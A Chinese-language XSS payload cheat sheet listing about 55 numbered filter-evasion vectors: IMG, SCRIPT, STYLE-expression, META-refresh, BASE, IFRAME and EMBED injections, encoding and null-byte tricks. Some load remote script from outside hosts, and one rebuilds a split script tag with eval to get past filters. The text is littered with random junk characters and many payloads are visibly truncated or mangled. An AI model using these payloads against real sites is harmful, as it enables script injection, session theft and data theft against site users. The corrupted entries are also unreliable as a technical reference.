(1)普通的XSS JavaScript注入5 k1 b! p& I# f. E( }
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
6 h$ Q5 x% y0 T(99)另类弹框
! c5 E+ A8 K' X, a: N# _<q/oncut=alert()>1* L) a2 h v0 i* H( s2 I% z
<s/onclick=alert()>b
2 |. Y6 }3 m8 N7 z2 C8 e- m; z <XSS=" onclick="alert(1)//">clickme</SSX=">
; s4 Q( v1 Q+ I1 U# m <zzz onclick=alert`1`>clickme</zzz>
3 r6 m8 K0 j, r0 l/ q! I+ Y <a onclick=alert`1`>clickme</a>* P7 z$ q' C* { C1 B0 w% v
<a=">clickme</a=">
; G, f) A9 T0 a1 C. ~- O<a=">clickme</a>+ C8 d" R8 ^$ E* R2 x; z
<z=">clickme</z=">
, ?/ Q3 ~* D1 e' i/ J6 R+ M* T' O<z onclick=alert`1`>clickme</z>
, V5 H. p& x7 y( B. h/ w! O5 {- t- P& {' c6 V' q
(2)IMG标签XSS使用JavaScript命令
& G- ` y' l( S! e) c! }$ _<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
0 ~$ F3 f8 C; o+ W7 w# D8 [6 L. {6 x4 ] v
(3)IMG标签无分号无引号: D9 s {* X0 V: o
<IMG SRC=javascript:alert(‘XSS’)>
% Q7 U; A. U1 l0 g' s& H. Y
+ o8 M3 W( s& j, }7 x/ ?(4)IMG标签大小写不敏感
2 ^; p. r1 c4 U8 V9 k; l$ }4 q, C<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
9 [$ H3 l+ j1 F& X$ ^. y: G5 f* i$ C2 {* K
(5)HTML编码(必须有分号)
* |" O# H- U6 k- v<IMG SRC=javascript:alert(“XSS”)>) Z* R: z. J/ W# }9 _
- b. {" ]5 Q6 {$ F8 n/ w5 |! g6 h(6)修正缺陷IMG标签/ @5 W* x, O; x' }) f n/ e, V
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>' @0 L! L7 V5 ~% T* z
& k8 v9 H) I# k) t! ?4 }
(7)formCharCode标签(计算器)
! p0 d) m# \& ?% C. V9 c0 p<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>- w `& H& v3 p X4 N0 w
) Y; x2 v2 M- B. y3 _(8)UTF-8的Unicode编码(计算器)) l2 g) W; A8 [0 M
<IMG SRC=jav..省略..S')>
. w2 G1 D3 |' o2 `7 ]3 f: P2 X" Y2 k
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
% `# u( w# q" z" z$ t<IMG SRC=jav..省略..S')>9 F" I/ T+ r) L; D+ H% o
8 _% B9 X* ~7 u0 n: \(10)十六进制编码也是没有分号(计算器)
' v) _2 X, C, Z<IMG SRC=\'#\'" /span>9 Y: E0 T- o0 ^; q3 v3 r
$ O5 `, P9 b1 |9 x0 t$ v: j4 e
(11)嵌入式标签,将Javascript分开
; @( G; y- }: i7 T5 v<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
8 \+ l+ @7 F5 _- D+ }2 D* c! y5 [: L, j+ k
(12)嵌入式编码标签,将Javascript分开& I7 d! g$ B+ N3 f7 J* f
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
, p& J8 {# I& B! l2 X; s' v7 B' X1 d9 Q* {& ^# w. ^# v
(13)嵌入式换行符
$ e5 s% i; x0 c* ]! w5 Z& b, l8 ]: [<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>: [# b4 u. ?3 K2 ? O, c
, q& i6 \( b& J* v7 I9 E" z(14)嵌入式回车
; r# C# A6 _8 X4 ]' Z<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
9 N9 b5 T; O0 e8 I" n" Q6 I8 U+ G- d
(15)嵌入式多行注入JavaScript,这是XSS极端的例子$ K3 l) Q2 V0 E) h- u6 G9 P8 d
<IMG SRC=\'#\'" /span>' V& ?3 n# w- Q) W% a
9 y% }1 h% l# g% E- _& q(16)解决限制字符(要求同页面)
7 l# l7 G, N/ ~: E1 k; p<script>z=’document.’</script>' f/ ^! w% |7 d" P
<script>z=z+’write(“‘</script>
, q: S$ U l' q<script>z=z+’<script’</script>
) ~) Z5 l" }, r, e' I6 e2 `<script>z=z+’ src=ht’</script>
. l* A+ H* ]/ C2 ^<script>z=z+’tp://ww’</script>
9 d O8 ?5 v' O7 k<script>z=z+’w.shell’</script>
* N m0 N9 c- L<script>z=z+’.net/1.’</script>
( [6 R6 H7 k" F/ s/ X<script>z=z+’js></sc’</script>3 ]8 i/ Q/ H0 M/ i3 M2 ]
<script>z=z+’ript>”)’</script>
6 f' R- v+ w" Q<script>eval_r(z)</script>% O2 K S5 j2 r- M* l
7 X6 Q' z& r; i% t( v9 T9 X4 o(17)空字符' P& p; f& D+ j0 a# I
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
6 n) Y. ~" E+ x3 I+ U8 ~
1 D$ l- f5 E$ K: N6 l4 j(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用! T8 R m3 l; M5 v! |
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
! z( W$ H+ E' h& Z4 n! O) D9 F2 {; i+ M# b* u
(19)Spaces和meta前的IMG标签
# S7 e6 ~- ~% Z6 E5 L! J) z<IMG SRC=\'#\'" javascript:alert(‘XSS’);”>* M5 U6 _3 W3 L9 B4 `1 {$ l
4 e) ^% U" }5 ?8 _, `3 p! ^
(20)Non-alpha-non-digit XSS x' p E" U6 I$ d/ p5 {& v
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
G) @9 a( [5 s- n2 i: y5 Y) j) p0 v1 i N
(21)Non-alpha-non-digit XSS to 28 a3 R* R2 l2 i; @4 }# I. @5 ]
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
9 c+ c' q! s! \1 a2 p8 W! F) w/ J# H1 |, L
(22)Non-alpha-non-digit XSS to 3
6 G, }5 i" L d<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
. \ U8 [! t/ B- H6 T* d" z- z6 R
" q9 _1 Y }2 X(23)双开括号
o: r6 j) j) ^9 |' I4 [9 p8 r<<SCRIPT>alert(“XSS”);//<</SCRIPT>
0 j: I* a2 q7 K3 I$ @2 v& U* g1 b. Q; V
(24)无结束脚本标记(仅火狐等浏览器)6 n3 O @! D/ ^4 z# r: i
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
% q/ X* a5 A: J7 Y" X; o4 ` ]) @
(25)无结束脚本标记2 t/ |3 Y( A: {$ P
<SCRIPT SRC=//3w.org/XSS/xss.js>
; D/ ?6 ?3 c7 B9 k. d8 {2 N1 t; L
) G+ ^. [, K8 J/ i(26)半开的HTML/JavaScript XSS" `! I: a2 ~6 G f
<IMG SRC=\'#\'" /span>
- l6 C# w, W/ J0 w K7 H8 L# d& E7 K# X2 U6 F8 ?& n% T2 |
(27)双开角括号
) `, N) u4 b" {+ _<iframe src=http://3w.org/XSS.html <: N# D8 M! N ~9 I, a; J& R* y
5 J. f+ e5 V6 b( Z4 p- W(28)无单引号 双引号 分号
$ f: E$ T6 J3 ^2 r1 D<SCRIPT>a=/XSS/& C; X! M/ C* ?- C# V! ~, c- w8 Y# }
alert(a.source)</SCRIPT>
% ~* @5 p* ~, N7 `- |! G7 N q( G, ]" q* k1 `
(29)换码过滤的JavaScript
9 l8 f0 T! H6 k\”;alert(‘XSS’);//
3 d, y4 Z& r5 e2 V8 m$ q2 {/ h0 E3 T$ e: t2 R# K
(30)结束Title标签
& d% M9 C+ s) W8 M</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>/ m, ^& X; ~; j- B; ~2 A
% M1 C" o: l# I. y$ j6 w1 [(31)Input Image
8 E6 R% E3 \7 S1 D1 W8 K9 l<INPUT SRC=\'#\'" /span>
/ _6 ~! d) n) a1 `
1 B8 x, p$ W0 r9 v) r( E(32)BODY Image4 J* r7 H3 H& ~0 n# T+ S
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>6 p9 e9 e/ v2 \& W( D8 g0 J8 M
6 P1 P, \2 d# @ X(33)BODY标签
1 |- W" Z& m; M0 F6 R<BODY(‘XSS’)>
4 A* k) R C+ a9 w+ R; Z6 d: z+ y( m0 a9 }
(34)IMG Dynsrc: C% T0 |( @' U( z
<IMG DYNSRC=\'#\'" /span>
6 e% v+ u, f& N1 v4 _, D6 a7 }( [% ?1 K% ]/ S, p& s" ?
(35)IMG Lowsrc& C& l' G/ V- Q- s( H( i
<IMG LOWSRC=\'#\'" /span>
. n9 L2 F( A7 p- k( R4 C/ m
9 h6 z8 i% k( k O2 X( a' U(36)BGSOUND
: I) q6 H9 k* l H2 b1 d9 o<BGSOUND SRC=\'#\'" /span>, z, L0 u( M8 b0 U6 i
2 S' ]; i& z. i4 p8 m: t
(37)STYLE sheet1 x& s: z/ v. @
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>5 l4 V3 O [ J
. M* M6 u c+ A9 o1 G3 p# z) B
(38)远程样式表" q6 _' W2 s: Z. _: B
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>/ o* s) ~7 P6 Z+ ^' ^4 K
) s& e+ v) S9 r: \& M' F( W(39)List-style-image(列表式)9 J: F8 w) x9 v+ e
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS. a6 f( A P3 u' m- [" \
Q4 \- t& x. V(40)IMG VBscript* r9 v2 V9 E8 t* L! a
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
) l1 N$ S& T0 ^$ j
. J0 G0 A$ k6 v) U6 x1 w4 ] Z" v(41)META链接url: M) N* V r2 }2 W0 i
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>$ K, U/ H: ]9 ^+ Y
4 u2 c! G. j7 m" _(42)Iframe2 ~! P" ]( R" B0 s( g
<IFRAME SRC=\'#\'" /IFRAME>0 O0 s" J: T. B( X8 O
% A: U9 l2 d# r& E
(43)Frame
7 H8 r7 E6 x+ h1 O( a3 I<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>6 q3 l* I1 s6 d0 m; |/ R3 m1 G4 b
& x/ d+ ~2 Y! t) t(44)Table! A4 C+ G: a3 H( Y& O/ n
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
; K( x6 i/ L/ v& Y9 d2 _
; G, O: S$ I0 g3 J(45)TD
+ D Z0 `3 |0 [$ c) q3 W: V<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>4 t4 p3 m5 L1 R ~/ C
% Q. t8 P1 o# c* w) J: e(46)DIV background-image
& b0 u8 A. u/ S+ f* ?2 m# L2 M<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>/ P! f1 Q R- g3 W ]8 M
H' _$ b' Y) k) |% u
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)1 g) E8 f& b% d G6 U
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>. {" {* a, q2 R# A) [
3 l& D$ r% ?, C' ?; k$ z
(48)DIV expression, I- \8 I/ T; Y+ |- u; u* Z
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
4 d( @, `( ~: m I6 e5 S% D
5 Q0 @; T6 H) u% [+ r( M$ r; V(49)STYLE属性分拆表达' ^+ s$ t! T- o+ k% A8 O
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
8 f; b. D4 [9 j6 L- w2 d$ T& A% o. q. p
(50)匿名STYLE(组成:开角号和一个字母开头)
3 ~9 E x5 U: P9 m5 p/ p# `9 ~<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
7 {) |% K0 h3 {! \0 `1 n. [6 U/ V# f7 W& B* y x
(51)STYLE background-image
5 S8 u" E2 q/ [: C( v/ c<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>. W) S: [; k F! L( U- z
8 b( u' y& I w! Y
(52)IMG STYLE方式% Q' x& v/ ^( }( \
exppression(alert(“XSS”))’>
4 C6 j# W2 l9 P# T$ f6 n. Y( b4 j1 _5 x& k" O# R
(53)STYLE background
- u; W$ Y+ q, U<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
9 A+ | f/ n* i8 B
9 {& P" U3 E" [4 n$ L( w(54)BASE3 t+ v3 Z, G) O
<BASE HREF=”javascript:alert(‘XSS’);//”>2 @9 b/ _, ]2 ]8 K. V
% k7 d o4 P7 m6 q(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
4 @2 ?$ i. [1 d. k- S) ]: ?<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
4 ^# _# M% _" H( V4 k |